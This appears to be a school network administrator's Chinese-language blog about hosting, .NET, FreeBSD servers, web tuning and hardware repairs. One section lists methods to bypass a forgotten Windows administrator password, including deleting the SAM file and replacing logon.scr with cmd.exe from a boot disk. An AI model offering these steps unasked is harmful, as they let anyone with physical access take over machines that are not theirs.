http://www.spymac.com 這個網站提供了：

• 1 GB e-mail 帳號，XXXX@spymac.com


• 250 MB 照片圖庫存放空間


• 100 MB 硬碟空間*


• personal blog, forum, gallery, auctions and more

[[MORE]]
至於如何上傳檔案到提供的空間,有以下兩種方法:
----------------------------------------------------------------
WebDAV Access(網站上傳):
主機位址: http://註冊的帳號.spymac.net:81
會員帳號: 註冊的帳號
密碼: xxxxxx
----------------------------------------------------------------
FTP access(ftp軟體上傳):
主機位置: 註冊的帳號.spymac.net
帳號: 註冊的帳號
密碼:xxxxx

如果要公佈你的網站記得要將網頁檔案傳到html資料夾內
你的網站網址將會是: http://註冊的帳號.spymac.net/

空間很大，只不過申請帳號要填的資料很煩，而且不支援中文。

Filemon

Filemon 是一個非常有用的工具，它可以監視你電腦中每個被存取的檔案。如果某個工具（例如 IIS 伺服器）一直運作失敗，我們可以利用這個工具去看看是不是有某個檔案權限設定錯誤。或者說電腦硬碟負荷很大時，我們可以看看到底是哪一個檔案一直被存取。

這個工具是免費的，你可以在 sysinternals的網站上找到，這個網站同時還提供了許多有用的系統工具。

Why .NET?

Chad Z. Hower aka Kudzu 在他的文章中闡述為什麼我們需要 .Net：
Why .NET?

不管你願不願意，它都已經來了，而且來勢洶洶。文中並提出幾個 .Net 為人詬病的問題，例如太慢、Runtime 太肥等等，並加以提出解釋。

Windows NT/2000/XP 忘記管理者密碼處理方式

因為 2000/XP 已經普及了，如果不小心忘記管理者密碼，該怎麼辦？

• 砍掉%SystemRoot%/system32/config/sam 這個密碼檔。（但 XP home 勿用此招）


• 用 NTFSDOS pro 將 winnt/system 32/config/sam 這個檔案刪除，即可重設密碼。


• 用Offline NT Password & Recovery Editor做開機片開機後，替換掉原來密碼。


• 用NTFS Driver for DOS支援的 MSDOS 開機片將 cmd.exe 替換掉C:WinntSystem32logon.scr，這樣開機後進入螢幕保護程式，結果就得到一個命令列模式。


• ERD Commander 2003是一個模擬視窗環境的開機片，開完機之後就可以做原本 Windows 下可以做的事情。聽說好用不過要錢。

HomePlug

本來寫了一篇說明，但不小心被我關掉了，懶得重寫一次，就給個連結吧。

雖然將來的目標是光纖到府，但這仍然很遙遠，因此我們利用現有的線路去架構我們的網路，例如電話線（傳統撥接或 ADSL）、第四台訊號線（Cable網路）。但除了電話線和有線電視訊號線還有沒有別的網路可以用？有的，就是電力公司交流電電源線。我們可以利用電源線傳遞交流電壓，再利用調變方式在裡面傳遞網路訊號，最高甚至可達 10Mbps 的速度。

使用這種方式的網路有一個特點，就是能加速實施「家電上網」的未來屋目標。因為只要能插上電源線的家電，通通都能夠上網了。電冰箱、洗衣機、甚至電風扇，以後都能透過電力網路遠端遙控開關機。但是也可能有一天駭客入侵你家的冰箱...後果自行想像吧。

HomePlug電力上網網址

GPL 授權的「自由」字型

王漢宗老師捐贈了幾十套字型給自由軟體界，每一套都比市面商業字型美觀，而且使用開放的 GPL 授權，大家可以自由安裝在自己的電腦中。

原先目的應該是讓 Linux上也可以有漂亮的字型可以用。不過這樣一來也可以一併解決電腦教室字型缺乏的問題，缺少美觀的字型在影像處理、網頁設計上都有點礙手礙腳。請大家可以宣傳並使用，日後也能效法王老師貢獻自己的作品與創意。

• 王漢宗字型下載區。


• 字型範例PDF

BBS 主機修理狀況 2

由於無法確定是 da0 或是 sym0 哪一個部分出了問題，但這兩個 device 都已經換過了，結果仍然繼續。暫時是沒輒的狀況，因為下一步就等於是要整台電腦換掉了，有電腦可以用嗎？我沒有，所以 BBS 繼續維持故障的狀態。

也許應該來弄個捐款，請各位使用者募捐贊助，讓 BBS 有維護的經費。

總務處已經提供最大的援助了，記憶體也給了，硬碟也給新的，SCSI 卡也換新的了。但如果要討一整台新電腦，恐怕就沒那麼容易了。得編列預算才行，不然就是整台送修。修理嗎？Pentium 2 的老舊機器怎麼修呢？

如何建立 FreeBSD 的 ports

如果寫程式有點心得，可以用這種方式貢獻你的創意：
特別針對 Ports 的 FAQ

更新系統 ports

我們有兩部 FreeBSD 主機，一台稱為 power，負責教師及全校性事務，一台稱為 student，負責學生空間。

power 及 student 兩台上的 ports 都已經更新到昨日最新。

今天很忙

• 修復王浩吉老師電腦


• 拯救劉子麟老師資料


• 宣告 BBS 再度不治


• 主教榮調高雄歡送會事前準備


• 高一小墾丁、高三公訓照片整理


• 協助游泳比賽攝影


• 協助詩歌朗誦比賽攝影


• 協助詩歌朗誦比賽場控


• 郭神父出國用NB整理

FreeBSD 6-CURRENT

有消息指出 FreeBSD 要出 6-Current 及 5.3-Release、5-Stable 的版本了。
這套偉大/吹毛求疵/穩定/高效率/免費/自由到極點/的作業系統，終於要邁入下一個里程碑了。

其他新聞：演算法露破綻 密碼學界譁然
MD5 跟 SHA-1 可能有安全上的瑕疵，駭客也許可製造出偽造卻可通過驗證的數位簽章，就像有人可以隨意複製你的私章一樣。

WordPress 的CSS樣式表範例

我覺得 WordPress 的預設畫面在套上中文化之後，實在非常難看。選單的字太小、配色詭異、看不到重點、文章與文章之間沒有明顯的區隔。

如果需要一些新配色的人，可以參考以下網站，提供不少免費範例：

alexking.org
McChris

.Net C# 資源 2

在安裝 .Net framework 2.0 SDK beta 1 之前，必須先安裝 .Net framework 2.0 beta 1。
按這裡連往下載網址
下載之前必須先用 .Net Passport 帳號登入，並做 E-mail 確認。

另外有兩個非常棒的程式分享網站：
CodeGuru
CodeProject （需註冊）
有很多專業的文章和元件範例可供下載。

BBS 主機修復

目前看起來果然是 SCSI 卡的問題。暫時從學校的電話交換機電腦上 A 過來一塊卡換上去，可以正常運作。

其他：
協助整理大學榜單。
整理今年暑期日本團照片並已經上網。

照片整理

主教照片光碟 2 張。
日本姊妹校拜訪照片 3 張。

BBS 主機修理狀況

7 月底之前 BBS 主機開始出現頻繁的當機，當時的錯誤訊息是 SCSI 硬碟寫入失敗，但重新開機之後卻仍能繼續運作數天。直到 8/1 確定硬碟終於再起不能，它發出嘎嘎的金屬聲音，再也無法開機。
於是立刻跟總務處請購一個 SCSI 硬碟，8/9 新硬碟來了，裝上去重灌，結果可以開機，也正常運作。
一天之後再度當機， SCSI 寫入失敗 / time out，因此原因指向 SCSI 卡故障。再度請購 SCSI 卡。

目前 BBS 主機已經不眠不休運作數年，有必要更新主機。但需提預算後，於下學年度採購。目前有 ACER 伺服器兩部，計畫在其中一台運行 FreeBSD，但 FreeBSD 卻一直抓不到它的 Raid Card。總之要錢的解決方案要等，但不用錢的卻困難重重。

.Net C# 資源

1. 免費的 .Net framework SDK 下載：
微軟MSDN連結
或者直接由 http://msdn.microsoft.com 去找。目前的最新版是 2.0 beta1，穩定版本則是 1.1。

2. 免費的 C# IDE： #develop
http://www.icsharpcode.net
它的介面很像 Visual Studio .Net，編寫基本的 C# 視窗應用程式應該都沒有問題才對。這個軟體本身也是用 C# 寫的。

3. 跨平台的 C# Compiler：mono
http://www.go-mono.org
這個東西是 GNU 授權軟體，可以在 win32 跟 linux 環境跨平台執行。

縣網中心九十三年度暑期學校網管人員研習

網址： http://www.ylc.edu.tw

我已經代表本校研習回來了，雖然內容上是我已經很熟悉的技術，但跟縣網管理人員交流後，瞭解其他學校的經驗，現在大概已經有腹案可以有效提升學校網路頻寬跟使用效率。

中華電信協助各校拉光纖到縣網這個方案很貴且沒有效率，因為最後還是塞在縣網到中正、中正到教育部、教育部到商業網路這中間。比較好的解決方案是，直接跟中華電信申請 512/512 ADSL，並透過寬頻分享器做靜態路由。電腦教室也透過寬頻分享器來稍做隔離。所謂的寬頻分享器或簡易 router 我原本想用 PC+FreeBSD+兩張網卡來實作，原先是想直接加裝在咱們的 web 伺服器上，但那一台現在同時身兼 DNS, SMTP, POP, Web, FTP, MySQL, Samba, ... 等等用途，所以負荷已經太大，故現在改考慮現成的 8 ports 寬頻分享器，也許比較有效率也比較方便。

順帶一題，這次有看到 CF 卡轉 IDE 介面的裝置，把 CF 卡當硬碟用可以安靜無聲，也沒有散熱問題，拿來當 NAT、Firewall 等用途的硬碟相當不錯。

.Net C# 研究

.Net C# 程式研究進度：

1. Windows Form 部署方式完成研究與測試。
2. Marshaling and Remoting 研究中...

使用教材：

Programming C#, 2nd Edition (O'Reilly) 推薦好書。

數位相片整理及歸檔完成

目前已經有兩片 4.5 GB DVD 容量的數位相片歸檔完成。
大約是這兩年來的活動記錄。
開放給大家借閱或轉錄。

劉哲維的電腦：修復。
高中導師室公用電腦：修復。

數位相片整理

整理下學期以來的大量數位照片-在「寫真正心」之中。

精彩的掃毒軟體

這是一個兼具視覺快感的掃毒軟體，大家有空、有錢的話可以試試看。

http://www.mobile01.com/newsdetail.php?id=1169

gallery 計數失常中

寫真正心的圖片計數器似乎在升級之後故障了。

努力修復中... (是嗎？）

解決天氣模組會使 IE 畫面亂掉的問題

主要是 img 標籤中 alt 屬性有不合法字元。
在 firefox 中可以正確顯示，但 IE 卻不行。
直接除掉 alt 就解決了。

天氣圖示模組

修改程式讓新版的天氣圖示模組可以正常運作。
什麼是天氣模組？就是可以在網頁上顯示即時的當地天氣，比如：

這是擷取自某新聞網站的資訊，事實上相當麻煩，又用掉一個早上。

apache tuning

修正部分 httpd.conf 設定，系統 loading 大幅下降，速度也提昇了。

參考：http://www-css.fnal.gov/dsg/external/freeware/mysqlTuning.html

PHP 效能調校

根據 鳥哥的Linux私房菜，我安裝 MMcache 來加強 php 的快取速度。

cd /usr/ports/www/turck-mmcache
make install

修改 /usr/local/etc/php.ini
增加一段 mmcache 的相關設定。

gallery 更新

gallery 模組更新到 1.4.4 RC1。
不過 block-random 隨機圖片一直無法正常運作，推測是 apache 效能的問題，真的需要調校一番了。

重灌柯老師的電腦

IBM Notebook 的硬碟藏在一個巧妙的地方，再把所有螺絲拆開之後，發現還是找不到硬碟。透過不斷思考與尋找，終於還是解決了。
把舊的 Notebook 硬碟改放入外接盒中，就變成好用的隨身碟。不過這個隨身碟雖然不需要外接電源，卻需要接兩個 USB port，這也是為了獲取更多電的方式吧。

又改了一個首頁程式的小 bug。

花了一個早上。

首頁系統程式修改完畢

正心首頁的程式已經修改完畢，如果在新聞方面有看到任何亂碼的話，請回報給我知道。

要徹底解決亂碼問題，還是只有將整個系統改成 utf-8 編碼才是治本之道，那又是一個大工程了。

更新正心首頁系統

正心首頁系統今天由 phpnuke 6.8 升級到 7.2。

但目前尚未 100% 完成，主要還是 Big5 編碼的問題，每次 upgrade 之後都得靠自己再 patch 一番才能正確運作。

另一方面，發現 PhpNuke 的官方版本已經將 chinese 語言的旗幟由五星旗改為青天白日滿地紅了。我個人對政治是冷感的，不過身為 phpnuke 的中文化作者，我覺得有必要端正視聽，我譯出來的中文明明是繁體的，卻硬要冠上五星旗，這是不正確的。你可以拿掉國旗，也可以弄個簡體版放五星旗，但把繁體中文硬跟五星旗兜在一起，這叫不明是非。

努力總算獲得稍許回報，以後就有一點動力繼續翻譯新版 phpnuke 了。

提供 blog 服務

各位教師如果想要無痛擁有個人網誌（類似本站），請
E-mail 給詹嘉隆老師。

微軟緊急發布：「下載傑克」重大安全公告

現在瀏覽網站，要小心囉！因為微軟在6月25日下午發佈了一個緊急重大安全公告，有一隻名為「下載傑克」Download_Ject的惡意程式已經在網路上散佈，此一病毒利用微軟網路瀏覽器(IIS 5.0)的安全弱點進行破壞，使用Internet Explorer的網友若是造訪受到病毒感染的網站，就會被植入此惡意程式，並且有可能讓駭客竊取密碼、信用卡號或其它個人資料。

Internet Explorer的網友避免遭到此種病毒侵襲的最好方式，就是下載最新的安全修補程式，並且將IE的安全等級提昇為高安全性。另外，安全專家也表示；網友可以用其他方式來保護自己電腦的安全，包括：關閉瀏覽器的JavaScript功能，或是改用其它的瀏覽器。

註：目前最佳的瀏覽器是 Mozilla Firefox 0.9

修復 power 伺服主機斷線問題

由於線路的彎曲與老舊，導致該主機呈現斷線狀態，目前已經修復。

網路頻寬檢測恢復

經由檢查線路及重新啟動主要路由設備之後，本校連外可用頻寬已經大幅提昇。
估計可能原因如下：

• 網路線老舊或彎曲，造成接觸不良。


• 路由設備過熱造成不穩。

由於一直沒有適當的檢測設備，都只能用「工人」檢測法來測試，有點沒效率。

接下來的工作重點

目前計畫將整個正心伺服器中的網頁/文件全部由 Big5 轉換到 Unicode，這是龐大的工程，勢必花上好幾個月，可是不做又不行（越晚做會麻煩越多）。
正心首頁是牽連最廣也是最麻煩的部分，當時為了整合，加入了很多 AddOn，還有許多自己寫的程式，轉換起來非常繁雜，我也「確信不可能百分之百完成」。尤其其中又包含了許多中文網址。（懇求大家千萬不要用中文作為網址！ m(_._)m ）

開始記錄一些東西吧！

這個系統是 WordPress 1.2-Mingus ，花了幾分鐘就裝起來了。看起來還不錯，支援 utf-8，這在目前來講才是王道。
自己在做些什麼事，總該留點記錄，要不然別人會很難跟上自己的腳步。
也希望將來如果自己不在學校了，會有人把這些工作繼續下去。

理想很多，但只有一步一步去做才會實現。